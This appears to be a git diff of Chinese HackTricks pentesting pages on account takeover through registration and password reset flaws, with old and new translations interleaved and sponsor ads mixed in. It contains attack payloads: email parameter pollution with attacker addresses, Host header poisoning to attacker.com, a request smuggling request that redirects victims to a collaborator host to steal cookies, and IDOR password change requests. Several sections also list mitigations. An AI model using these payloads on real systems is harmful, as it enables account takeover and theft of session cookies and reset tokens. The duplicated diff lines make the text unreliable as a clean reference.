立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %}

View file

@ -1,26 +1,27 @@
# 注册 & 接管漏洞
# 注册与接管漏洞
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上**关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户接管和勒索软件攻击。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -33,27 +34,27 @@ WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户接
### 重复注册
* 尝试使用现有用户名生成
* 检查变化的电子邮件:
* 大写
* \+1@
* 在电子邮件中添加一些点
* 电子邮件名称中的特殊字符(%00%09%20
* 在电子邮件后放置黑色字符:`test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
* 检查不同的电子邮件:
* 大写字母
* \+1@
* 在电子邮件中添加一些点
* 电子邮件名称中的特殊字符 (%00, %09, %20)
* 在电子邮件后放置黑色字符:`test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
### 用户名枚举
检查是否可以确定应用程序中是否已经注册了用户名
检查您是否可以判断用户名是否已在应用程序中注册
### 密码策略
创建用户时检查密码策略(检查是否可以使用弱密码)。\
创建用户时检查密码策略(检查是否可以使用弱密码)。\
在这种情况下,您可以尝试暴力破解凭据。
### SQL 注入
[**查看此页面**](sql-injection/#insert-statement)了解如何尝试通过注册表单中的**SQL 注入**进行账户接管或提取信息。
[**查看此页面**](sql-injection/#insert-statement)以了解如何通过注册表单中的 **SQL 注入** 尝试账户接管或提取信息。
### Oauth 接管
@ -67,33 +68,37 @@ WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户接
[saml-attacks](saml-attacks/)
{% endcontent-ref %}
### 更改电子邮件
注册后尝试更改电子邮件,并检查此更改是否得到正确验证,或是否可以更改为任意电子邮件。
### 更多检查
* 检查是否可以使用**一次性电子邮件**
* **长** **密码**>200会导致**拒绝服务**
* 检查是否可以使用 **一次性电子邮件**
* **长** **密码** (>200) 导致 **DoS**
* **检查账户创建的速率限制**
* 使用 username@**burp\_collab**.net 并分析**回调**
* 使用 username@**burp\_collab**.net 并分析 **回调**
## **密码重置接管**
### 通过引用者泄漏密码重置令牌 <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
### 通过引荐者泄露密码重置令牌 <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. 请求将密码重置到您的电子邮件地址
2. 击密码重置链接
2. 击密码重置链接
3. 不要更改密码
4. 击任何第三方网站例如FacebookTwitter
5. 拦截 Burp Suite 代理中的请求
6. 检查 referer 标头是否泄漏密码重置令牌。
4. 击任何第三方网站例如FacebookTwitter
5. 在 Burp Suite 代理中拦截请求
6. 检查 referer 头是否泄露密码重置令牌。
### 密码重置操纵 <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
### 密码重置中毒 <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. 在 Burp Suite 中拦截密码重置请求
2. 在 Burp Suite 中添加或编辑以下头:`Host: attacker.com``X-Forwarded-Host: attacker.com`
3. 使用修改后的标头转发请求\
2. 在 Burp Suite 中添加或编辑以下头`Host: attacker.com``X-Forwarded-Host: attacker.com`
3. 转发带有修改头部的请求\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. 查找基于 _host 头_的密码重置 URL例如`https://attacker.com/reset-password.php?token=TOKEN`
4. 查找基于 _host 头_ 的密码重置 URL例如`https://attacker.com/reset-password.php?token=TOKEN`
### 通过电子邮件参数进行密码重置 <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
### 通过电子邮件参数重置密码 <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
@ -110,58 +115,58 @@ email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### API参数上的IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
1. 攻击者必须使用他们的帐户登录并转到**更改密码**功能。
2. 启动Burp Suite并拦截请求
3. 将其发送到重器选项卡并编辑参数用户ID/电子邮件\
1. 攻击者必须使用他们的账户登录并进入**更改密码**功能。
2. 启动Burp Suite并拦截请求
3. 将其发送到重器选项卡并编辑参数用户ID/电子邮件\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
### 弱密码重置令牌 <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
密码重置令牌应该是随机生成的,并且每次都是唯一的。\
尝试确定令牌是否过期或是否始终相同,在某些情况下,生成算法较弱,可以被猜测。以下变量可能被算法使用。
尝试确定令牌是否过期或是否总是相同,在某些情况下,生成算法较弱,可以被猜测。以下变量可能被算法使用。
* 时间戳
* 用户ID
* 用户电子邮件
* 用户电子邮件
* 名字和姓氏
* 出生日期
* 密码学
*
* 仅数字
* 小令牌序列(字符在\[A-Z,a-z,0-9]之间)
* 令牌重用
* 令牌过期日期
### 泄露密码重置令牌 <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
1. 使用API/UI触发特定电子邮件的密码重置请求例如test@mail.com
2. 检查服务器响应并查`resetToken`
3. 然后在URL中使用令牌如`https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
2. 检查服务器响应并查`resetToken`
3. 然后在URL中使用令牌如`https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### 通过用户名冲突进行密码重置 <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
1. 使用与受害者用户名相同的用户名在系统上注册,但在用户名之前和/或之后插入空格。例如:`"admin "`
2. 使用您的恶意用户名请求重置密码
3. 使用发送到您电子邮件的令牌重置受害者密码。
4. 使用新密码连接到受害者户。
1. 使用与受害者用户名相同的用户名在系统中注册,但在用户名前后插入空格。例如:`"admin "`
2. 使用您的恶意用户名请求密码重置。
3. 使用发送到您电子邮件的令牌重置受害者密码。
4. 使用新密码连接到受害者户。
平台CTFd容易受到此攻击的影响。\
见:[CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
平台CTFd对该攻击存在漏洞。\
见:[CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### 通过跨站脚本攻击实施账户接管 <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
1. 在应用程序内部或子域中找到XSS漏洞如果cookie的范围限定在父域:`*.domain.com`
2. 泄露当前**会话cookie**
3. 使用cookie用户进行身份验证
1. 在应用程序或子域中找到XSS如果cookies的作用域为父域:`*.domain.com`
2. 泄露当前**会话cookie**
3. 使用cookie作为用户进行身份验证
### 通过HTTP请求走私实施账户接管 <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1. 使用**smuggler**检测HTTP请求走私的类型CL、TE、CL.TE\
1\. 使用**smuggler**检测HTTP请求走私的类型CL, TE, CL.TE\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2. 构造一个请求,该请求将使用以下数据覆盖`POST / HTTP/1.1`\
`GET http://something.burpcollaborator.net HTTP/1.1 X:`目的是将受害者重定向到burpcollab并窃取其cookie\
3. 最终请求可能如下所示
2\. 构造一个请求,该请求将用以下数据覆盖`POST / HTTP/1.1`\
`GET http://something.burpcollaborator.net HTTP/1.1 X:`目的是将受害者重定向到burpcollab并窃取他们的cookies\
3\. 最终请求可能看起来像以下内容
```
GET / HTTP/1.1
Transfer-Encoding: chunked
@ -174,26 +179,26 @@ GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone 报告利用此漏洞\
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### 通过 CSRF 进行账户接管 <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
1. 创建 CSRF 的 payload例如“自动提交密码更改的 HTML 表单”
2. 发送 payload
1. 创建 CSRF 的有效载荷,例如:“用于密码更改的自动提交 HTML 表单”
2. 发送有效载荷
### 通过 JWT 进行账户接管 <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
JSON Web Token 可能用于验证用户身份
JSON Web Token 可能用于验证用户。
* 编辑 JWT使用另一个用户 ID / 电子邮件
* 使用另一个用户 ID / 电子邮件编辑 JWT
* 检查弱 JWT 签名
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}
## 参考资料
## 参考文献
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
@ -201,24 +206,25 @@ JSON Web Token 可能用于验证用户身份。
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **泄露**
WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户接管和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,196 +1,198 @@
# 重置/忘记密码绕过
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
通过最新的赏金计划发布和重要平台更新保持信息更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作
**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧
## **通过引用者泄漏密码重置令牌**
## **通过引荐人泄露密码重置令牌**
* 如果密码重置令牌包含在URL中HTTP引用者标头可能会泄漏该令牌。当用户在请求密码重置后单击第三方网站链接时可能会发生这种情况
* **影响**:通过跨站请求伪造CSRF攻击潜在接管帐户
* **利用**:要检查引用者标头中是否泄漏了密码重置令牌,请**向您的电子邮件地址请求密码重置**,然后单击提供的重置链接。**不要立即更改密码**。而是,**导航到第三方网站**如Facebook或Twitter同时**使用Burp Suite拦截请求**。检查请求以查看**引用者标头是否包含密码重置令牌**,因为这可能会向第三方泄露敏感信息
* 如果密码重置令牌包含在 URL 中HTTP referer 头可能会泄露该令牌。这可能发生在用户请求密码重置后点击第三方网站链接时
* **影响**:通过跨站请求伪造 (CSRF) 攻击可能导致账户接管
* **利用**:要检查密码重置令牌是否在 referer 头中泄露,**请求密码重置**到您的电子邮件地址,并**点击提供的重置链接**。**不要立即更改密码**。相反,**在使用 Burp Suite 拦截请求时****导航到第三方网站**(如 Facebook 或 Twitter。检查请求以查看 **referer 头是否包含密码重置令牌**,因为这可能会将敏感信息暴露给第三方
* **参考**
* [HackerOne报告342693](https://hackerone.com/reports/342693)
* [HackerOne报告272379](https://hackerone.com/reports/272379)
* [密码重置令牌泄文章](https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a)
* [HackerOne 报告 342693](https://hackerone.com/reports/342693)
* [HackerOne 报告 272379](https://hackerone.com/reports/272379)
* [密码重置令牌泄文章](https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a)
## **密码重置中毒**
* 攻击者可能在密码重置请求期间操纵主机标头,将重置链接指向恶意站点
* **影响**:通过向攻击者泄漏重置令牌导致潜在接管帐户
* 攻击者可能在密码重置请求中操纵 Host 头,将重置链接指向恶意网站
* **影响**:通过将重置令牌泄露给攻击者,可能导致账户接管
* **缓解步骤**
* 针对允许的域名白名单验证主机标头
* 使用安全的服务器端方法生成绝对URL。
* **修补**:使用`$_SERVER['SERVER_NAME']`构建密码重置URL而不是使用`$_SERVER['HTTP_HOST']`
* 验证 Host 头是否在允许的域名白名单中
* 使用安全的服务器端方法生成绝对 URL。
* **修补**:使用 `$_SERVER['SERVER_NAME']` 构造密码重置 URL而不是 `$_SERVER['HTTP_HOST']`
* **参考**
* [Acunetix关于密码重置中毒的文章](https://www.acunetix.com/blog/articles/password-reset-poisoning/)
* [Acunetix 关于密码重置中毒的文章](https://www.acunetix.com/blog/articles/password-reset-poisoning/)
## **通过操纵电子邮件参数重置密码**
攻击者可以通过添加额外的电子邮件参数来操纵密码重置请求,以转移重置链接。
* 使用`&`将攻击者电子邮件作为第二个参数添加
* 使用 & 添加攻击者电子邮件作为第二个参数
```php
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
```
* 使用 %20 将攻击者电子邮件添加为第二个参数
* 使用 %20 将攻击者电子邮件作为第二个参数添加
```php
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
```
* 使用 | 将攻击者电子邮件添加为第二个参数
* 使用 | 将攻击者电子邮件作为第二个参数添加
```php
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
```
* 使用 cc 将攻击者的电子邮件添加为第二个参数
* 使用抄送将攻击者电子邮件添加为第二个参数
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
```
* 使用密件抄送将攻击者的电子邮件添加为第二个参数
* 使用 bcc 将攻击者电子邮件作为第二个参数添加
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
```
* 使用 , 将攻击者电子邮件添加为第二个参数
* 使用 , 将攻击者电子邮件作为第二个参数添加
```php
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
```
* 将攻击者电子邮件添加为 JSON 数组中的第二个参数
* 在 JSON 数组中将攻击者电子邮件作为第二个参数添加
```php
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}
```
* **缓解步骤**:
* 服务器端正确解析和验证电子邮件参数。
* 使用预处理语句或参数化查询防止注入攻击。
* **参考**:
* **缓解步骤**
* 服务器端正确解析和验证电子邮件参数。
* 使用预处理语句或参数化查询防止注入攻击。
* **参考文献**
* [https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be](https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be)
* [https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/](https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/)
* [https://twitter.com/HusseiN98D/status/1254888748216655872](https://twitter.com/HusseiN98D/status/1254888748216655872)
## **通过 API 参数更改任何用户的电子邮件和密码**
## **通过API参数更改任何用户的电子邮件和密码**
* 攻击者可以修改 API 请求中的电子邮件和密码参数,以更改帐户凭据。
* 攻击者可以在API请求中修改电子邮件和密码参数以更改账户凭据。
```php
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})
```
* **缓解步骤**:
* 确保严格的参数验证和身份验证检查。
* 实施强大的日志记录和监控以检测和响应可疑活动。
* **参考**:
* [通过 API 参数操纵实现完整账户接管](https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240)
* **缓解步骤**
* 确保严格的参数验证和身份验证检查。
* 实施强大的日志记录和监控以检测和响应可疑活动。
* **参考**
* [通过API参数操纵进行完整账户接管](https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240)
## **无速率限制: 邮件轰炸**
## **无速率限制:电子邮件轰炸**
* 密码重置请求缺乏速率限制可能导致邮件轰炸,用重置邮件淹没用户
* **缓解步骤**:
* 基于 IP 地址或用户账户实施速率限制。
* 使用 CAPTCHA 挑战来防止自动滥用。
* **参考**:
* [HackerOne 报告 280534](https://hackerone.com/reports/280534)
* 密码重置请求缺乏速率限制可能导致电子邮件轰炸,使户被重置电子邮件淹没。
* **缓解步骤**
* 基于IP地址或用户账户实施速率限制。
* 使用CAPTCHA挑战以防止自动滥用。
* **参考**
* [HackerOne报告280534](https://hackerone.com/reports/280534)
## **找密码重置令牌生成方式**
## **找密码重置令牌生成方式**
* 了解令牌生成背后的模式或方法可以帮助预测或暴力破解令牌。一些选项:
* 基于时间戳
* 基于用户ID
* 基于用户电子邮件
* 基于名字和姓氏
* 基于出生日期
* 基于密码学
* **缓解步骤**:
* 使用强大的密码学方法进行令牌生成
* 确保足够的随机性和长度以防止可预测性。
* **工具**: 使用 Burp Sequencer 分析令牌的随机性。
* 理解令牌生成背后的模式或方法可以导致预测或暴力破解令牌。一些选项:
* 基于时间戳
* 基于用户ID
* 基于用户电子邮件
* 基于名字和姓氏
* 基于出生日期
* 基于
* **缓解步骤**
* 使用强大的加密方法生成令牌
* 确保足够的随机性和长度以防止可预测性。
* **工具**使用Burp Sequencer分析令牌的随机性。
## **可猜测的 UUID**
## **可猜测的UUID**
* 如果UUID版本1是可猜测或可预测的攻击者可能会暴力破解它们以生成有效的重置令牌。检查
* 如果 UUID版本 1是可猜测或可预测的攻击者可能会暴力破解它们以生成有效的重置令牌。检查:
{% content-ref url="uuid-insecurities.md" %}
[uuid-insecurities.md](uuid-insecurities.md)
{% endcontent-ref %}
* **缓解步骤**:
* 使用 GUID 版本 4 以获得随机性,或为其他版本实施额外的安全措施。
* **工具**: 使用 [guidtool](https://github.com/intruder-io/guidtool) 分析和生成 GUID。
* **缓解步骤**
* 使用GUID版本4以获得随机性或对其他版本实施额外的安全措施。
* **工具**:使用[guidtool](https://github.com/intruder-io/guidtool)分析和生成GUID。
## **响应操纵: 用良好的响应替换坏的响应**
## **响应操纵:用好响应替换坏响应**
* 操纵 HTTP 响应以绕过错误消息或限制。
* **缓解步骤**:
* 实施服务器端检查以确保响应完整性。
* 使用安全通信渠道如 HTTPS 防止中间人攻击。
* **参考**:
* [Live Bug Bounty 活动中的关键漏洞](https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3)
* 操纵HTTP响应以绕过错误消息或限制。
* **缓解步骤**
* 实施服务器端检查以确保响应完整性。
* 使用安全通信通道如HTTPS以防止中间人攻击。
* **参考**
* [实时漏洞赏金活动中的关键漏洞](https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3)
## **使用过期令牌**
* 测试过期令牌是否仍用于密码重置。
* **缓解步骤**:
* 实施严格的令牌过期策,并在服务器端验证令牌过期。
* 测试过期令牌是否仍可用于密码重置。
* **缓解步骤**
* 实施严格的令牌过期策,并在服务器端验证令牌过期。
## **暴力破解密码重置令牌**
* 尝试使用工具如 Burpsuite 和 IP-Rotator 暴力破解重置令牌以绕过基于 IP 的速率限制。
* **缓解步骤**:
* 实施强大的速率限制和账户锁定机制。
* 监控可疑活动,表明可能存在暴力破解攻击。
* 尝试使用Burpsuite和IP-Rotator等工具暴力破解重置令牌以绕过基于IP的速率限制。
* **缓解步骤**
* 实施强大的速率限制和账户锁定机制。
* 监控可疑活动,以指示暴力破解攻击。
## **尝试使用您的令牌**
* 测试攻击者的重置令牌是否可以与受害者的电子邮件一起使用。
* **缓解步骤**:
* 确保令牌绑定到用户会话或其他用户特定属性。
* **缓解步骤**
* 确保令牌绑定到用户会话或其他用户特定属性。
## **注销/密码重置中的会话失效**
* 确保用户注销或重置密码时会话失效。
* **缓解步骤**:
* 实施适当的会话管理,确保所有会话在注销或密码重置时失效。
* **缓解步骤**
* 实施适当的会话管理,确保所有会话在注销或密码重置时失效。
## **注销/密码重置中的会话失效**
* 重置令牌应在一段时间后失效。
* **缓解步骤**:
* 为重置令牌设置合理的过期时间,并在服务器端严格执行。
* 重置令牌应具有过期时间,过期后将失效。
* **缓解步骤**
* 为重置令牌设置合理的过期时间,并在服务器端严格执行。
## 参考
@ -198,15 +200,30 @@ POST /api/changepass
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的内容
参与深入探讨黑客的刺激和挑战的内容
**实时黑客新闻**\
通过实时新闻和见解了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
随时了解最新的赏金任务发布和重要平台更新
及时了解最新的漏洞赏金发布和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),立即与顶尖黑客合作!
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持HackTricks</summary>
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
